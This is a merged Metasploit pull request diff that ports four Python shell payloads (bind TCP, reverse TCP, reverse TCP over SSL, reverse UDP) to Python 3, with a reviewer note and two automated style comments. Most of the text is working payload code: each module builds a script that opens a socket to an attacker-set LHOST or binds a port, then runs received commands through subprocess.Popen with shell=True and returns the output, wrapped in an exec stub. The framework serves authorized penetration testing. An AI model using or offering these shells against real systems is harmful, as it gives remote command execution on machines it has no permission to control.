
fix #14207, fix python/shell_reverse_tcp on python3 #14325

Merged
merged 10 commits into from
Nov 23, 2020
17 changes: 8 additions & 9 deletions modules/payloads/singles/python/shell_bind_tcp.rb
Expand Up @@ -5,15 +5,16 @@

module MetasploitModule

CachedSize = 381
CachedSize = 557

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Bind TCP (via python)',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
'Author' => 'mumbai',
'License' => MSF_LICENSE,
'Platform' => 'python',
Expand All @@ -35,22 +36,20 @@ def generate

def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
dead = Rex::Text.rand_text_alpha(3)
# Set up the socket
cmd << "import socket,os\n"
cmd << "import socket,subprocess\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
cmd << "so.listen(1)\n"
cmd << "so,addr=so.accept()\n"
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"

# base64
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
cmd
py_create_exec_stub(cmd)
2.7 works, however I'm getting an error due to os.popen3 not being available on Python3. Looks like that will need to be updated too.

end
end
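Review bot: The new `py_create_exec_stub(cmd)` line that now ends `command_string` has no comment saying why the generated script is handed to a stub instead of being returned raw, and the old `# base64` comment that explained the inline `exec('...'.decode('base64'))` appears to leave with the removed lines, so the rationale is lost. A one-line why-comment above it such as `# Wrap the script in the shared Python exec stub (from Msf::Payload::Python); replaces the inline base64 exec, which relied on Python 2-only str.decode('base64')` would preserve it; I am inferring the stub's origin from the mixin included above, so confirm that against the helper. The same applies to the corresponding hunks in shell_reverse_tcp.rb, shell_reverse_tcp_ssl.rb and shell_reverse_udp.rb, which also drop their "Base64 encoding is required ..." rationale comment.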
18 changes: 8 additions & 10 deletions modules/payloads/singles/python/shell_reverse_tcp.rb
Expand Up @@ -9,15 +9,16 @@

module MetasploitModule

CachedSize = 401
CachedSize = 573

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Reverse TCP (via python)',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
'License' => MSF_LICENSE,
'Platform' => 'python',
Expand Down Expand Up @@ -45,24 +46,21 @@ def generate
#
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
dead = Rex::Text.rand_text_alpha(3)
# Set up the socket
cmd << "import socket,os\n"
cmd << "import socket,subprocess\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
# The actual IO
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"

# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

cmd
py_create_exec_stub(cmd)
end
end

10 changes: 4 additions & 6 deletions modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
Expand Up @@ -9,15 +9,16 @@

module MetasploitModule

CachedSize = 561
CachedSize = 621

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Reverse TCP SSL (via python)',
'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+',
'Author' => 'RageLtMan <rageltman[at]sempervictus>',
'License' => BSD_LICENSE,
'Platform' => 'python',
Expand Down Expand Up @@ -60,10 +61,7 @@ def command_string
cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
cmd += "\ts.sendall(stdout_value)\n"

# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

cmd
py_create_exec_stub(cmd)
end
end
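Review bot: The tail of `command_string` that this hunk reworks still builds the script with `cmd += "\tstdout_value=..."` and `cmd += "\ts.sendall(stdout_value)\n"`, whereas the three sibling modules changed in the same PR (shell_bind_tcp.rb, shell_reverse_tcp.rb, shell_reverse_udp.rb) append with `cmd << ...`. Since this commit already touches the end of the method, switching those lines to `cmd << "\ts.sendall(stdout_value)\n"` would make the four modules read the same and avoid allocating a fresh String per appended line; behavior is unchanged either way, so this is a style point only. `command_string` starts above the hunk, so the remaining `+=` lines are not visible here.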

16 changes: 7 additions & 9 deletions modules/payloads/singles/python/shell_reverse_udp.rb
Expand Up @@ -9,9 +9,10 @@

module MetasploitModule

CachedSize = 397
CachedSize = 573

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
Expand Down Expand Up @@ -45,24 +46,21 @@ def generate
#
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
dead = Rex::Text.rand_text_alpha(3)
# Set up the socket
cmd << "import socket,os\n"
cmd << "import socket,subprocess\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
# The actual IO
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"

# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

cmd
py_create_exec_stub(cmd)
end

end